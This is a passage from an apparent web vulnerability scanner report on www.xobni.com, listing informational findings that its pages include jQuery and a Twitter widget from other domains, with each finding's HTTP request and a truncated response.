   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Search Outlook Ca
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.101. http://www.xobni.com/outlook-social-connector previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/outlook-social-connector

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /outlook-social-connector HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:05:03 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13069

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni for Microso
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.102. http://www.xobni.com/partners previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/partners

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /partners HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.8.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10553

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.103. http://www.xobni.com/partners/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/partners/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /partners/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10598

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.104. http://www.xobni.com/partners/partners_content previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/partners/partners_content

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /partners/partners_content HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13010

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.105. http://www.xobni.com/partners/partners_content.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/partners/partners_content.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /partners/partners_content.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13022

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.106. http://www.xobni.com/partners/partners_signup.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/partners/partners_signup.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14792

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Email Search Add
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.107. http://www.xobni.com/plus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/plus

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /plus HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:03:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14943

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Plus - Rech
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.108. http://www.xobni.com/press/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /press/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:35 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 16569

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.109. http://www.xobni.com/press/05202010_german_release.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/05202010_german_release.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /press/05202010_german_release.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

12.110. http://www.xobni.com/press/09022010_harris_survey previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/09022010_harris_survey

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /press/09022010_harris_survey HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:42 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 17914

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.111. http://www.xobni.com/press/10282010_french_release.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/10282010_french_release.php

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /press/10282010_french_release.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12289

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.112. http://www.xobni.com/press/coverage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/coverage

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:44 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 178670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.113. http://www.xobni.com/press/logos previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/logos

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /press/logos HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/legal/trademarks
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:37 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 12628

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Press Cente
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.114. http://www.xobni.com/press/releases previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/releases

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /press/releases HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/press/
Cookie: tree_session_id=455376; __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:13:40 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni News Room:
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.115. http://www.xobni.com/press/testimonials previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/press/testimonials

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js
http://widgets.twimg.com/j/2/widget.js

Request

GET /press/testimonials HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/learnmore/video
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.5.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:33 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 14533

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni Testimonial
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...
</style>
           <script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...

12.116. http://www.xobni.com/products previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/products

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /products HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/download
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.3.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:30 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9142

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.117. http://www.xobni.com/relationship-management previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/relationship-management

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /relationship-management HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/learnmore/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:17:22 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 11932

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Outlook Relations
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.118. http://www.xobni.com/salesforce previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/salesforce

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /salesforce HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/?lc=fr
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 13054

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Salesforce in Out
...[SNIP]...
<link rel='stylesheet' href='/csscache/1291147037/styles/global.css' type='text/css'>

   <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js"></script>
...[SNIP]...

12.119. http://www.xobni.com/salesforce-outlook previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.xobni.com
Path:	/salesforce-outlook

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.1/jquery.min.js

Request

GET /salesforce-outlook HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/huddle-outlook
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
